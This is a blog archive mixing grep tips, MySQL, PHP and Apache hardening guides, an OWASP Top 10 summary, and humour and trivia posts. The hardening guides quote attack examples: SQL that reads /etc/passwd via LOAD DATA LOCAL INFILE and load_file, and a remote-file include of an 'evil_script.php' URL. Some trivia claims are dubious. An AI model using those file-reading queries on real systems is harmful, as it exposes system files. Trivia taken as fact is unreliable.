The Magic of `grep` command

  1. Search and Find Files

    grep –i python ./
  2. Search a string Recursively in all Directories

    grep –r “function” *
  3. Searches for the entire pattern

    grep –w “RUNNING”
  4. Search and Replace All Files

    grep -lr -e 'old text' * | xargs sed -i 's/old text/new text/g'
  5. Search and Replace Specified File

    find -name myconfig_file.txt | xargs sed -i 's/old text/new text/g'
  6. Search a word in a file

    grep -c "Error" logfile.txt
  7. Case insensitive search

    grep -i "string" FILE
  8. Display N lines after match

    grep -A  "string" FILENAME
  9. Display N lines before match

    grep -B  "string" FILENAME
  10. Display N lines around match

    grep -C  "string" FILENAME
  11. Counting the number of matches

    grep -c "pattern" filename
Categories: Rochak Chauhan | Leave a comment

Security and Hardening Tips for MySQL

  1. Disable or restrict remote access


    Consider whether MySQL will be accessed from the network or only from its own server. If remote access is used, ensure that only defined hosts can access the server. This is typically done through TCP wrappers, iptables, or any other firewall software or hardware available on the market. To restrict MySQL from opening a network socket, the following parameter should be added in the[mysqld] section of my.cnf or my.ini:

    skip-networking

    The file is located in the “C:\Program Files\MySQL\MySQL Server 5.1″ directory on the Windows operating system or “/etc/my.cnf” or “/etc/mysql/my.cnf” on Linux.

    This line disables the initiation of networking during MySQL startup. Please note that a local connection can still be established to the MySQL server.

    Another possible solution is to force MySQL to listen only to the localhost by adding the following line in the [mysqld] section of my.cnf

    bind-address=127.0.0.1

    You may not be willing to disable network access to your database server if users in your organization connect to the server from their machines or the web server installed on a different machine. In that case, the following restrictive grant syntax should be considered:

    mysql> GRANT SELECT, INSERT ON mydb.* TO 'someuser'@'somehost';

  2. Disable the use of LOCAL INFILE


    The next change is to disable the use of the “LOAD DATA LOCAL INFILE” command, which will help to prevent unauthorized reading from local files. This is especially important when new SQL Injection vulnerabilities in PHP applications are found.

    In addition, in certain cases, the “LOCAL INFILE” command can be used to gain access to other files on the operating system, for instance “/etc/passwd”, using the following command:

    mysql> LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE table1

    Or even simpler:

    mysql> SELECT load_file("/etc/passwd")

    To disable the usage of the “LOCAL INFILE” command, the following parameter should be added in the [mysqld] section of the MySQL configuration file.

    set-variable=local-infile=0

  3. Change root username and password


    The default administrator username on the MySQL server is “root”. Hackers often attempt to gain access to its permissions. To make this task harder, rename “root” to something else and provide it with a long, complex alphanumeric password.

    To rename the administrator’s username, use the rename command in the MySQL console:

    mysql> RENAME USER root TO new_user;

    The MySQL “RENAME USER” command first appeared in MySQL version 5.0.2. If you use an older version of MySQL, you can use other commands to rename a user:

    mysql> use mysql;
    mysql> update user set user="new_user" where user="root";
    mysql> flush privileges;
    

    To change a user’s password, use the following command-line command:

    mysql> SET PASSWORD FOR 'username'@'%hostname' = PASSWORD('newpass');
    

    It is also possible to change the password using the “mysqladmin” utility:

    shell> mysqladmin -u username -p password newpass
    

  4. Remove the “test” database


    MySQL comes with a “test” database intended as a test space. It can be accessed by the anonymous user, and is therefore used by numerous attacks.

    To remove this database, use the drop command as follows:

    mysql> drop database test;
    
    Or use the "mysqladmin" command:
    
    shell> mysqladmin -u username -p drop test
    

  5. Remove Anonymous and obsolete accounts

    The MySQL database comes with some anonymous users with blank passwords. As a result, anyone can connect to the database To check whether this is the case, do the following:

    mysql> select * from mysql.user where user="";

    In a secure system, no lines should be echoed back. Another way to do the same:

    mysql> SHOW GRANTS FOR ''@'localhost';
    mysql> SHOW GRANTS FOR ''@'myhost';
    

    If the grants exist, then anybody can access the database and at least use the default database”test”. Check this with:

    shell> mysql -u blablabla
    

    To remove the account, execute the following command:

    mysql> DROP USER "";
    

    The MySQL “DROP USER” command is supported starting with MySQL version 5.0. If you use an older version of MySQL, you can remove the account as follows:

    mysql> use mysql;
    mysql> DELETE FROM user WHERE user="";
    mysql> flush privileges;
    
  6. Lower database privileges


    Operating system permissions were fixed in the preceding section. Now let’s talk about database permissions. In most cases, there is an administrator user (the renamed “root”) and one or more actual users who coexist in the database. Usually, the “root” has nothing to do with the data in the database; instead, it is used to maintain the server and its tables, to give and revoke permissions, etc.

    On the other hand, some user ids are used to access the data, such as the user id assigned to the web server to execute “select\update\insert\delete” queries and to execute stored procedures. In most cases, no other users are necessary; however, only you, as a system administrator can really know your application’s needs.

    Only administrator accounts need to be granted the SUPER / PROCESS /FILE privileges and access to the mysql database. Usually, it is a good idea to lower the administrator’s permissions for accessing the data.

    Review the privileges of the rest of the users and ensure that these are set appropriately. This can be done using the following steps.

    mysql> use mysql;
    
    [Identify users]
    
    mysql> select * from users;
    
    [List grants of all users]
    
    mysql> show grants for ‘root’@’localhost’;
    

    The above statement has to be executed for each user ! Note that only users who really need root privileges should be granted them.

    Another interesting privilege is “SHOW DATABASES”. By default, the command can be used by everyone having access to the MySQL prompt. They can use it to gather information (e.g., getting database names) before attacking the database by, for instance, stealing the data. To prevent this, it is recommended that you follow the procedures described below.

    Add " --skip-show-database" to the startup script of MySQL 
    or add it to the MySQL configuration file Grant the SHOW DATABASES
    privilege only to the users you want to use this command

    To disable the usage of the “SHOW DATABASES” command, the following parameter should be added in the [mysqld] section of the /etc/my.cnf:

    [mysqld]
    skip-show-database
    

  7. Enable Logging


    If your database server does not execute many queries, it is recommended that you enable transaction logging, by adding the following line to [mysqld] section of the /etc/my.cnf file:

    [mysqld]
    log =/var/log/mylogfile
    

    This is not recommended for heavy production MySQL servers because it causes high overhead on the server.

    In addition, verify that only the “root” and “mysql” ids have access to these logfiles (at least write access).

    Error log

    Ensure only “root” and “mysql” have access to the logfile “hostname.err”. The file is stored in the mysql data directory. This file contains very sensitive information such as passwords, addresses, table names, stored procedure names and code parts. It can be used for information gathering, and in some cases, can provide the attacker with the information needed to exploit the database, the machine on which the database is installed, or the data inside it.

    MySQL log

    Ensure only “root” and “mysql” have access to the logfile “*logfileXY”. The file is stored in the mysql data directory.

  8. Optimizing Performance


    Set max_connections to the number of concurrent connections you need. The default value is only 100 connections, which is very small.

    Note: connections take memory and your OS might not be able to handle a lot of connections. MySQL binaries for Linux/x86 allow you to have up to 4096 concurrent connections, but self compiled binaries often have less of a limit.

    Set table_cache to match the number of your open tables and concurrent connections. Watch the open_tables value and if it is growing quickly you will need to increase its size.

    Note: The 2 previous parameters may require a lot of open files. 20+max_connections+table_cache*2 is a good estimate for what you need. MySQL on Linux has an open_file_limit option to set this limit.

    If you have complex queries sort_buffer_size and tmp_table_size are likely to be very important. Values will depend on the query complexity and available resources, but 4Mb and 32Mb, respectively are recommended starting points.

    Note: These are “per connection” values, among read_buffer_size, read_rnd_buffer_size and some others, meaning that this value might be needed for each connection. So, consider your load and available resource when setting these parameters. For example sort_buffer_size is allocated only if MySQL nees to do a sort. Note: be careful not to run out of memory.

    If you have many connects established (i.e. a web site without persistent connections) you might improve performance by setting thread_cache_size to a non-zero value. 16 is good value to start with. Increase the value until your threads_created do not grow very quickly.

  9. Index the Search Fields


    Indexes are not just for the primary keys or the unique keys. If there are any columns in your table that you will search by, you should almost always index them.

    As you can see, this rule also applies on a partial string search like “last_name LIKE ‘a%’”. When searching from the beginning of the string, MySQL is able to utilize the index on that column.

    You should also understand which kinds of searches can not use the regular indexes. For instance, when searching for a word (e.g. “WHERE post_content LIKE ‘%apple%’”), you will not see a benefit from a normal index. You will be better off using mysql fulltext search or building your own indexing solution.

  10. Enable the slow query log


    MySQL prior to 5.1.0 requires a change to the MySQL my.cnf file and a restart in order to log slow queries; from MySQL 5.1.0 you can change this dynamically without having to restart.

    To make the change permanent whenever the MySQL server is started, and for MySQL prior 5.1.0, edit your my.cnf file (on Linux boxes this is usually somewhere like /etc/my.cnf or /etc/mysql/my.cnf) and uncomment the “log_slow_queries” line or add it if it’s not present.

    On a Debian box, for example, the line to uncomment looks like so:

    log_slow_queries = /var/log/mysql/mysql-slow.log
    

    You can change the log file name to something else or leave it blank so it uses the default. The default is to log the queries into a file in the MySQL data directory. On my Debian test box this was “mysqld-slow.log”.

    To enable or disable the setting dynamically in MySQL 5.1.0 run the following query to enable it:

    set global log_slow_queries = ON;
    

    and to disable it:

    set global log_slow_queries = OFF;
    

    Setting the long query time

    You can also specify how long a quey needs to run for before it is logged with the “long_query_time” setting. By default this is 10 seconds.

    In the my.cnf file, to change it to e.g. 5 seconds add the following:

    long_query_time = 5
    

    This can be changed dynamically in MySQL 5.0.0+ (and possibly earlier versions) by running the following query:

    set global long_query_time = 5;
    

    This will only work for new connections; any connections which have already been established will continue to use the old setting. Once the user disconnects and reconnects their new connection will use the new setting.

Categories: Technology, Tips and Tricks, Unethical Hacking | Leave a comment

Security and Hardening Tips for PHP

  1. Disable sensetive functions in PHP


    Edit the php.ini file :

    sudo vi /etc/php5/apache2/php.ini

    Add or edit the following lines an save :

    disable_functions = exec,system,shell_exec,passthru,etc ......
    register_globals = Off
    expose_php = Off
    display_errors = Off
    track_errors = Off
    html_errors = Off
    magic_quotes_gpc = Off
    

    Restart Apache server. Open a Terminal and enter the following :

    sudo /etc/init.d/apache2 restart

  2. Disable allow_url_fopen ( enabled by default )


    This directive allows PHP’s file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.

    If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.

    ; Disable allow_url_fopen in php.ini for security reasons
    allow_url_fopen = Off

    The setting can also be applied in apache’s httpd.conf :

    # Disable allow_url_fopen for security reasons
    php_admin_flag allow_url_fopen Off

    It prevents URLs from being used in PHP. A command like include (“http://www.example.com/evil_script.php”) will not be allowed to execute. Only files that reside within your site can be included: include(“/var/www/html/config.inc.php”).

    NOTE: A large number of code injection vulnerabilities reported in PHP web applications are caused by enabling allow_url_fopen and bad input filtering. You should disable this directive for security reasons.

  3. Disable Display Errors


    The display_errors directive determines whether error messages should be sent to the browser. These messages frequently contain sensitive information about your web application environment and should always be disabled.

    ; Disable display_errors in php.ini for security reasons
    display_errors = Off
    log_errors = On

    The setting can also be disabled in apache’s httpd.conf or .htaccess file:

    # Disable display_errors for security reasons
    php_flag display_errors Off
    php_flag log_errors On

    NOTE: display_errors should be disabled and all error messages should be passed to system log files using the log_errors directive.

  4. Disable magic_quotes


    magic_quotes_gpc provides some rudimentary protection against SQL injection and is a generic solution that doesn’t include all the characters that require escaping. It effectively executes addslashes() on all information received over COOKIE, GET and POST. Because it’s inconsistent and ineffective, it’s recommended to disable magic_quotes_gpc. Rely on input filtering done by your scripts.

    ; Disable Magic Quotes in php.ini for security reasons
    magic_quotes_gpc = Off
    
    # The setting can also be applied in apache's httpd.conf or .htaccess file:
    php_flag magic_quotes_gpc Off

    NOTE: If the magic_quotes_sybase directive is also On it will completely override magic_quotes_gpc. Having both directives enabled means only single quotes are escaped as ”. Double quotes, backslashes and NUL’s will remain untouched and unescaped.

  5. Disable register_globals


    A number of older scripts assume that the data sent by a form will automatically have a PHP variable of the same name.

    If your form has an input field with a name of “somename”, older PHP scripts assume that the PHP will automatically create a variable called $somename that contains the value set in that field.

    ; Disable register globals in php.ini for security reasons
    register_globals = Off

    The setting can also be applied in apache’s httpd.conf or .htaccess file:

    # Disable register globals for security reasons
    php_flag register_globals Off

    NOTE: Register Globals should always be disabled.

  6. Protect PHP Sessions


    Protect your sessions from being hijacked or shared in links people post online or send to friends by enabling cookie httponly. It will also prevent Javascript from reading your cookies.

    session.cookie_httponly = 1
    
    Also add a referer check, like:
    
    session.referer_check = yourwebsite.com
    

    You might want to change your default session save path to somewhere hackers won’t find as easily. E.g:

    session.save_path = /var/lib/php

  7. Disable use_trans_sid


    When use_trans_sid is enabled, PHP will add a unique PHPSESSID query pair to URIs within your site if cookies are not available and session.use_trans_sid is set. This makes it far easier for a malicious party to obtain an active session ID and hijack the session. It’s recommended to disable use_trans_sid in your PHP environment.

    ; Disable use_trans_sid for security reasons
    session.use_trans_sid = Off
    

    The setting can also be disabled in apache’s httpd.conf or .htaccess file:

    # Disable use_trans_sid for security reasons
    php_flag session.use_trans_sid Off

  8. Make use of correct php.ini file


    Each PHP installation has two set of php.ini files namely “php.ini-production” and “php.ini-development”.
    Safe to say that there is quite number of opinions on what should be enabled and what should be disabled. Most of the disagreement arise from the conflict of interest between those using PHP in production and those using it for development. Developers want display_errors on, they want to see E_NOTICE and E_STRICT errors, while those who use PHP in production want to rather log errors to a log file or syslog, and then nothing but the most critical of errors.

    Main difference between the values of these two versions of files are

    	short_open_tag
    	disable_functions 	
    	memory_limit
    	session.gc_probability 
    	display_startup_errors 
    	track_errors
    	error_reporting
    

  9. Restrict File Uploads (Application Specific


    If you’re not utilizing file upload functionality in any of your PHP scripts then it’s a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. By disabling file uploads altogether this makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:

    file_uploads = Off

    Even if you do allow file uploads you should change the default temporary directory used for file uploads. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration alteration than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict upload directories and file sizes change your php.ini so that it reads:

    upload_tmp_dir = /var/php_tmp
    upload_max_filezize = 2M
    

  10. Analyse PHP Setting using “PhpSecInfo”

    PhpSecInfo provides an equivalent to the phpinfo() function that reports security information about the PHP environment, and offers suggestions for improvement. It is not a replacement for secure development techniques, and does not do any kind of code or app auditing, but can be a useful tool in a multilayered security approach.

    Ref: http://phpsec.org/projects/phpsecinfo/

Categories: PHP, Technology, Tips and Tricks, Unethical Hacking | Comments Off

Security and Hardening Tips for Apache

  1. Use mod_security and mod_evasive Modules to Secure Apache


    Where mod_security works as a firewall for our web applications and allows us to monitor traffic on a real time basis. It also helps us to protect our websites or web server from brute force attacks. You can simply install mod_security on your server with the help of your default package installers.
    Install mod_security on Ubuntu

    These commands will install dependencies:

    sudo apt-get install libxml2 libxml2-dev libxml2-utils
    sudo apt-get install libaprutil1 libaprutil1-dev
    

    If you are using 64 bit Ubuntu run this command:

    ln -s /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/libxml2.so.2
    

    This command will install mod security:

    sudo apt-get install libapache-mod-security

    Configuring ModSecurity Rules

    mv /etc/modsecurity/modsecurity.conf-recommended 
    /etc/modsecurity/modsecurity.conf
    

    now for configuring the modsecurity run the following command.

    gedit /etc/modsecurity/modsecurity.conf

    Now find SecRuleEngine by searching in the file and change SecRuleEngine to On .

    SecRuleEngine On

    Mod_evasive

    mod_evasive works very efficiently, it takes one request to process and processes it very well. It prevents DDOS attacks from doing as much damage. This feature of mod_evasive enables it to handle the HTTP brute force and Dos or DDos attack. This module detects attacks with three methods.

    • If so many requests come to a same page in a few times per second.
    • If any child process trying to make more than 50 concurrent requests.
    • If any IP still trying to make new requests when its temporarily blacklisted.
  2. Do not allow browsing outside the document root


    Allowing browsing outside the document root is inviting trouble. Unless you have a specific need to allow it, disable this feature. First, you’ll need to edit the document root Directory entry like so:

    
    
    Order Deny, Allow
    
    Deny from all
    
    Options None
    
    AllowOverride None
    

    Now, if you need to add options to any directory within the document root, you will have to add a new Directory entry for each one.

  3. Hide Apache’s version number


    The best offense is a good defense. And one of the best defenses is to obfuscate as much information about your service as you can. One crucial bit of information to hide is the Apache version number. By hiding it, you keep unwanted users from knowing how to quickly hack your Web server. To hide Apache’s version number, add the following in your document root Directory tag:

    ServerSignature Off
    ServerTokens Prod

  4. Enable Apache Logging


    Apache allows you to logging independently of your OS logging. It is wise to enable Apache logging, because it provides more information, such as the commands entered by users that have interacted with your Web server.

    To do so you need to include the mod_log_config module. There are three main logging-related directives available with Apache.

    • TransferLog: Creating a log file.
    • LogFormat : Specifying a custom format.
    • CustomLog : Creating and formatting a log file.

    You can also use them for a particular website it you are doing Virtual hosting and for that you need to specify it in the virtual host section. For example, here is the my website virtual host configuration with logging enabled.

    
    DocumentRoot /var/www/html/example.com/
    ServerName www.example.com
    DirectoryIndex index.htm index.html index.php
    ServerAlias example.com
    ErrorDocument 404 /story.php
    ErrorLog /var/log/httpd/example.com_error_log
    CustomLog /var/log/httpd/example.com_access_log combined
    
    

  5. Immunize httpd.conf


    One of the best security measures is to hide your httpd.conf file from prying eyes. If people who shouldn’t see your httpd.conf file can’t see it, they can’t change it. To immunize the httpd.conf file, set the immutable bit with the following command:

    chattr +i /path/to/httpd.conf

    where /path/to/httpd.conf is the path to your Apache configuration file. Now it will be very difficult for anyone to make any changes to httpd.conf.

  6. Protect DDOS attacks and Hardening


    Well, it’s true that you cannot completely protect your web site from DDos attacks. Here are some directives which can help you to have a control on it.

    TimeOut : This directive allows you to set the amount of time the server will wait for certain events to complete before it fails. Its default value is 300 secs. It’s good to keep this value low on those sites which are subject to DDOS attacks. This value totally depends on kind of request you are getting on your website. Note: It could pose problems with come CGI scripts.

    • MaxClients : This directive allows you to set the limit on connections that will be served simultaneously. Every new connection will be queued up after this limit. It is available with Prefork and Worker both MPM. The default value of it is 256.
    • KeepAliveTimeout : Its the amount of time the server will wait for a subsequent request before closing the connection. Default value is 5 secs.
    • LimitRequestFields : It helps us to set a limit on the number of HTTP request’s header fields that will be accepted from the clients. Its default value is 100. It is recommended to lower this value if DDos attacks are occurring as a result of so many http request headers.
    • LimitRequestFieldSize : It helps us to set a size limit on the HTTP Request header.
  7. Disable Trace HTTP Request


    The default TraceEnable on permits TRACE, which disallows any request body to accompany the request. TraceEnable off causes the core server and mod_proxy to return a 405 (Method not allowed) error to the client.

    TraceEnable on allows for Cross Site Tracing Issue and potentially giving the option to a hacker to steal your cookie information.

    Solution: -

    Address this security issue by disabling the TRACE HTTP menthod in Apache Configuration. You can do by Modifying/Adding below directive in your httpd.conf of your Apache Web Server.

    # vi httpd.conf
    
    TraceEnable off
    

  8. Restrict File/Folder Access


    RewriteEngine on
    RewriteCond %{REQUEST_URI} !^/index\.php$
    RewriteCond %{REQUEST_URI} !^/file/(.+)
    RewriteCond %{REQUEST_URI} !^/includes/images/(apple|date)\.jpg$
    RewriteRule (.*) - [F]
    

    This code will only allow access to:

    (apple.jpg, date.jpg) from your /includes/images/ folder.
    Your index.php file.
    Any file from your /file/ directory.

    Otherwise it will forbid access to any other file and will serve 403 Forbidden error.

    PS: You don’t need this code below in your .htaccess file anymore.

    Order Deny,Allow
    Deny from All
    
    <files "index.php">
    Order Deny,Allow
    allow from all
    </files>
    

  9. Enable PHP basedir


    PHP has built in a kind of chroot environment. It is called “basedir”. You can configure PHP scripts to access files only in specific directory similar to chroot. Basically you can configure each site to access only files located in that site directory which is a very good idea from the security point of view.

    You can add the following lines to the website configuration file or to .htaccess file to enable PHP basedir:

    Php_value open_basedir /var/www/foo.bar/:/usr/local/php/

    This will specify that your PHP scripts can access only specified directories.

  10. Update, Update, Update


    Just because it is Apache running on Linux doesn’t mean you shouldn’t bother to update. New holes and security risks are found all the time. You should always develop a sound update policy to keep on top of patches. If you have installed Apache with your distributions package manager, you can make the updates go seamlessly. If you have installed from source, make sure that upgrade is not going to break any modules or dependencies your Web site has. And if you update Apache, make sure PHP (if used) is updated as well.

Categories: Apache, Technology, Tips and Tricks, Unethical Hacking | Comments Off

Top 10 Application Security Risks (OWASP)

A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

 

 

A2 – Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

 

 

A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious site


 

A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

 

A5 – Security Misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.

 

A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A7 – Missing Function Level Access Control

Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

A9 – Using Components with Known Vulnerabilities

Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.

A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

 

View Source:

Download PDF

Categories: Technology, Tips and Tricks, Unethical Hacking | Comments Off

99 Facts about Guys that Girls should know!

  1. Guys don’t actually look after good-looking girls. they prefer neat and presentable girls.
  2. Guys hate other flirts.
  3. A guy can like you for a minute, and then forget you afterwards.
  4. When a guy says he doesn’t understand you, it simply means you’re not thinking the way he is.
  5. Are you doing something?” or “Have you eaten already?” are the first usual questions a guy asks on the phone just to get out from stammering.
  6. Guys may be flirting around all day but before they go to sleep, they always think about the girl they truly care about.
  7. When a guy really likes you, he’ll disregard all your bad characteristics.
  8. Guys go crazy over a girl’s smile.
  9. Guys will do anything just to get the girl’s attention.
  10. Guys hate it when you talk about your ex-boyfriend.
  11. When guys want to meet your parents. Let them. …….dont think so
  12. Guys want to tell you many things but they can’t. And they have one habit to gain courage and spirit to tell you many things and it is drinking! but do not generalize
  13. Guys cry!!!
  14. Don’t provoke the guy to heat up. Believe me. He will.
  15. Guys can never dream and hope too much.
  16. Guys usually try hard to get the girl who has dumped them, and this makes it harder for them to accept their defeat.
  17. When you touch a guy’s heart, there’s no turning back.
  18. Giving a guy a hanging message like “You know what?!..uh…never mind!” would make him jump to a conclusion that is far from what you are thinking.
  19. Guys go crazy when girls touch their hands……yeh rite – Whatever.
  20. Guys are good flatterers when courting but they usually stammer when they talk to a girl they really like.
  21. When a guy makes a prolonged “umm” or makes any excuses when you’re asking him to do you a favor, he’s actually saying that he doesn’t like you and he can’t lay down the card for you.
  22. When a girl says “no”, a guy hears it as “try again tomorrow”. So true.
  23. You have to tell a guy what you really want before he gets the message clearly.
  24. Guys hate gays!
  25. Guys love their moms.
  26. A guy would sacrifice his money for lunch just to get you a couple of roses.
  27. A guy often thinks about the girl who likes him. But this doesn’t mean that the guy likes her.
  28. You can never understand him unless you listen to him.
  29. If a guy tells you he loves you once in a lifetime. He does.
  30. Beware. Guys can make gossips scatter through half of the face of the earth faster than girls can.
  31. Like Eve, girls are guys’ weaknesses.
  32. Guys are very open about themselves.
  33. It’s good to test a guy first before you believe him. But don’t let him wait that long.
  34. No guy is bad when he is courting
  35. Guys hate it when their clothes get dirty. Even a small dot.
  36. Guys really admire girls that they like even if they’re not that much pretty.
  37. Your best friend, whom your boyfriend seeks help from about his problems with you may end up being admired by your boyfriend.
  38. If a guy tells you about his problems, he just needs someone to listen to him. You don’t need to give advice…….very true.
  39. A usual act that proves that the guy likes you is when he teases you.
  40. A guy finds ways to keep you off from linking with someone else.
  41. Guys love girls with brains more than girls in miniskirts. ……..some times…
  42. Guys try to find the stuffed toy a girl wants but would unluckily get the wrong one.
  43. Guys virtually brag about anything.
  44. Guys cannot keep secrets that girls tell them.
  45. Guys think too much.
  46. Guys’ fantasies are unlimited.
  47. Girls’ height doesn’t really matter to a guy but her weight does!……very true.
  48. Guys tend to get serious with their relationship and become too possessive. So watch out girls!!!
  49. When a girl makes the boy suffer during courtship, it would be hard for him to let go of that girl.
  50. It’s not easy for a guy to let go of his girlfriend after they broke up especially when they’ve been together for 3 years or more.
  51. You have to tell a guy what you really want before getting involved with that guy.
  52. A guy has to experience rejection, because if he’s too-good-never-been-busted, never been in love and hurt, he won’t be matured and grow up.
  53. When an unlikable circumstance comes, guys blame themselves a lot more than girls do. They could even hurt themselves physically.
  54. Guys have strong passion to change but have weak will power.
  55. Guys are tigers in their peer groups but become tamed P**** with their girlfriends….
  56. When a guy pretends to be calm, check if he’s sweating. You’ll probably see that he is nervous.
  57. When a guy says he is going crazy about the girl. He really is.
  58. When a guy asks you to leave him alone, he’s just actually saying, “Please come and listen to me”……sometimes .
  59. Guys don’t really have final decisions.
  60. When a guy loves you, bring out the best in him.
  61. If a guy starts to talk seriously, listen to him….very important.
  62. If a guy has been kept shut or silent, say something.
  63. Guys believe that there’s no such thing as love at first sight, but court the girls anyway and then realize at the end that he is wrong.
  64. Guys like femininity not feebleness.
  65. Guys don’t like girls who punch harder than they do.
  66. A guy may instantly know if the girl likes him but can never be sure unless the girl tells him.
  67. A guy would waste his time over video games and football, the way a girl would do over her romance novels and make-ups.
  68. Guys love girls who can cook or bake. ….they love u regardless.
  69. Guys like girls who are like their moms. No kidding!……true but only wen the guys are ready 2be settled down.
  70. A guy has more problems than you can see with your naked eyes.
  71. A guy’s friend knows everything about him. Use this to your advantage.
  72. Don’t be a snob. Guys may easily give up on the first sign of rejection.
  73. Don’t be biased. Try loving a guy without prejudice and you’ll be surprised.
  74. Girls who bathe in their eau de perfumes do more repelling than attracting guys.
  75. Guys are more talkative than girls are especially when the topic is about girls.
  76. Guys don’t comprehend the statement “Get lost” too well.
  77. Guys really think that girls are strange and have unpredictable decisions but still love them more.
  78. When a guy gives a crooked or pretentious grin at your jokes, he finds them offending and he just tried to be polite.
  79. Guys don’t care about how shiny their shoes are unlike girls.
  80. Guys tend to generalize about girls but once they get to know them, they’ll realize they’re wrong.
  81. Any guy can handle his problems all by his own. He’s just too stubborn to deal with it.
  82. Guys find it so objectionable when a girl swears.
  83. Guys’ weakest point is at the knee.
  84. When a problem arises, a guy usually keeps himself cool but is already thinking of a way out.
  85. When a guy is conscious of his looks, it shows he is not good at fixing things.
  86. When a guy looks at you, either he’s amazed by you or he’s criticizing you.
  87. When you catch him cheating on you and he asks for a second chance, give it to him. But when you catch him again and he asks for another chance, ignore him.
  88. If a guy lets you go, he really loves you.
  89. If you have a boyfriend, and your boy best friend always glances at you and it obviously shows that he is jealous whenever you’re with your boyfriend, all I can say is your boy best friend loves you more than your boyfriend does.
  90. Guys learn from experience not from the romance books that girls read and take as their basis of experience.
  91. You can tell if a guy is really hurt or in pain when he cries in front of you!
  92. If a guy suddenly asks you for a date, ask him first why.
  93. When a guy says he can’t sleep if he doesn’t hear your voice even just for one night, hang up. He also tells that to another girl. He only flatters you and sometimes makes fun of you.
  94. You can truly say that a guy has good intentions if you see him praying sometimes.
  95. Guys seek for advice not from a guy but from a girl.
  96. Girls are allowed to touch boys’ things. Not their hair!
  97. If a guy says you’re beautiful, that guy likes you.
  98. Guys hate girls who overreact. ……sometimes
  99. Guys love you more than you love them IF they are serious in your relationships.
Categories: Entertainment, Humour | Tags: , | Comments Off

True Friends

RESULT AGAR ACHCHA HO
Maa – Bhagwan ki kripa hai.
Papa – Beta Kiska Hai.
Dost – Chal Daaru Peete hain.

 
RESULT AGAR BURA HO:
Maa – Aag lage is college main.
Papa – Laad pyar ne bigaad diya.
Dost – Chal Daaru Peete hain.

 

NAUKRI LAGNE PAR:
Maa – Apni sehat ka khyal rakhna
Papa – Khoob Mehnat se kaam karna
Dost – Chal Daaru Peete hain

 

NAUKRI CHHOTNE PAR
Maa – Naukri hee kharab thee
Papa – Koi baat Nahin, doosri mil jayegi
Dost – Chal Daaru Peete hain

 

BIRTHDAY PER:
Maa – Jug jug jiye mera beta.
Papa – Hamesha aage badhe.
Dost – Chal Daaru Peete hain.

 

SHAADI PAR
Maa – Sadaa Sukhi Raho
Papa – Khush Raho
Dost – Chal Daaru Peete hain
BACHHA HONE PAR
Maa – Bilkul mere bete par gaya / gayi hai
Papa – Khush Raho
Dost – Chal Daaru Peete hain

 

LOVE MAIN FAIL HONE PER:
Maa – Beta Bhool ja usko.
Papa – Mard ban.
Dost – Chal Daaru Peete hain.

 

MORAL:
Duniya badal jati hai par DOST kabhi nahin badalte

Categories: Entertainment, Humour | 629 Comments

21 Interesting Facts

1. Chewing on gum while cutting onions can help a person from stop
producing tears. Try it next time you chop these bulbs.

2. Until babies are six months old, they can breathe and swallow at
the same time. Indeed convenient!

3. Offered a new pen to write with, 97% of all people will write their own name!

4. Male mosquitoes are vegetarians. Only females bite and savour blood.

5. The average person’s field of vision encompasses a 200-degree wide angle.

6. To find out if a watermelon is ripe, knock it, and if it sounds
hollow then it is ripe.

7. Canadians can send letters with personalized postage stamps showing
their own photos on each stamp.

8. Babies’ eyes do not produce tears until the baby is approximately
six to eight weeks old.

9. It actaully snowed in the Sahara Desert in February of 1979. Can
you beat that!!

10. Plants watered with warm water grow larger and more quickly than
plants watered with cold water.

11. Wearing headphones for just an hour will increase the bacteria in
your ear by 700 times.

12. Grapes explode when you put them in the microwave.

13. Those stars and colours you see when you rub your eyes are called
phosphenes.

14. Our eyes are always the same size from birth, but our nose and
ears never stop growing.

15. Everyone’s tongue print is different, like fingerprints.

16. Contrary to popular belief, a swallowed chewing gum doesn’t stay
in the gut. It will pass through the system and be excreted.

17. At 40 degrees centigrade a person loses about 14.4 calories per
hour by breathing.

18. There is a hotel in Sweden built entirely out of ice; it is
rebuilt every year.

